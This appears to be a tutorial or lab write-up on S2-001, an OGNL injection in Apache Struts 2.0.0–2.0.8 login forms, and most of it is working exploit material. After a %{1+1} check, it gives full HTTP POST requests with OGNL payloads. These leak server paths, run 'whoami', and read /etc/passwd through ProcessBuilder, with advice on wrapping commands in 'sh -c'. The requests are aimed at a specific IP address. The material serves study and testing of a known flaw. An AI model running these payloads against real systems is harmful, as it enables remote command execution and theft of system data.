The vulnerability arises because, when a user submits form data and validation fails, the backend takes the previously submitted parameter values, evaluates them as OGNL expressions through %{value}, and then re-populates the corresponding form fields with the result. A registration or login page is the typical case: after a failed submission the backend normally echoes the submitted data back into the form, and because that data is run through %{value}, i.e. one round of OGNL evaluation, a payload can be constructed directly to execute commands. This is S2-001 (Struts 2.0.0 through 2.0.8, fixed in 2.0.9).

S2-001 test environment

Verifying the vulnerability

First, enter %{1+1} in the password field.

Click Login; the page comes back with 2 in that field.

That proves the vulnerability is present: the server evaluated the expression instead of echoing the input back verbatim.

POC && EXP

Get the Tomcat working directory (the JVM's user.dir, which for a Tomcat started from catalina.sh is the bin directory):

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
POST /login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447 HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://188.40.189.134:8080
Connection: close
Referer: http://188.40.189.134:8080/login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447
Cookie: ECS[visit_times]=2; lang=zh-CN; has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; i_like_gitea=fb9d9391b26c39d0; zbx_sessionid=9a280be3024b7e5dbb74b5fcd5f62d83; PHPSESSID=071iqkp4k4tierhdosl431ol90; redirect=1
Upgrade-Insecure-Requests: 1

username=admin&password=%25%7B%22tomcatBinDir%7B%22%2B%40java.lang.System%40getProperty%28%22user.dir%22%29%2B%22%7D%22%7D

Get the web root path (written straight into the response via the HttpServletResponse held in the OGNL context):

%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}
POST /login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447 HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Origin: http://188.40.189.134:8080
Connection: close
Referer: http://188.40.189.134:8080/login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447
Cookie: ECS[visit_times]=2; lang=zh-CN; has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; i_like_gitea=fb9d9391b26c39d0; zbx_sessionid=9a280be3024b7e5dbb74b5fcd5f62d83; PHPSESSID=071iqkp4k4tierhdosl431ol90; redirect=1
Upgrade-Insecure-Requests: 1

username=admin&password=%25%7B+%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest%28%29%2C+%23response%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2C+%23response.println%28%23req.getRealPath%28%27%2F%27%29%29%2C+%23response.flush%28%29%2C+%23response.close%28%29+%7D

Command execution

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}
POST /login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447 HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 584
Origin: http://188.40.189.134:8080
Connection: close
Referer: http://188.40.189.134:8080/login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447
Cookie: ECS[visit_times]=2; lang=zh-CN; has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; i_like_gitea=fb9d9391b26c39d0; zbx_sessionid=9a280be3024b7e5dbb74b5fcd5f62d83; PHPSESSID=071iqkp4k4tierhdosl431ol90; redirect=1
Upgrade-Insecure-Requests: 1

username=admin&password=%25%7B+%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C+%23b%3D%23a.getInputStream%28%29%2C+%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C+%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C+%23e%3Dnew+char%5B50000%5D%2C+%23d.read%28%23e%29%2C+%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C+%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C+%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29+%7D

When the command to run takes arguments, it has to be split: each argument becomes its own element of the String[] handed to ProcessBuilder. There is no shell in between, so a pipe or redirect has to be wrapped as {"sh","-c","..."}. Change the payload above to:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}
POST /login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447 HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
Origin: http://188.40.189.134:8080
Connection: close
Referer: http://188.40.189.134:8080/login.action;jsessionid=8490E02D5A20AEDA869E5EFF28995447
Cookie: ECS[visit_times]=2; lang=zh-CN; has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; i_like_gitea=fb9d9391b26c39d0; zbx_sessionid=9a280be3024b7e5dbb74b5fcd5f62d83; PHPSESSID=071iqkp4k4tierhdosl431ol90; redirect=1
Upgrade-Insecure-Requests: 1

username=admin&password=%25%7B+%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C+%23b%3D%23a.getInputStream%28%29%2C+%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C+%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C+%23e%3Dnew+char%5B50000%5D%2C+%23d.read%28%23e%29%2C+%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C+%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C+%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29+%7D

That's about it.
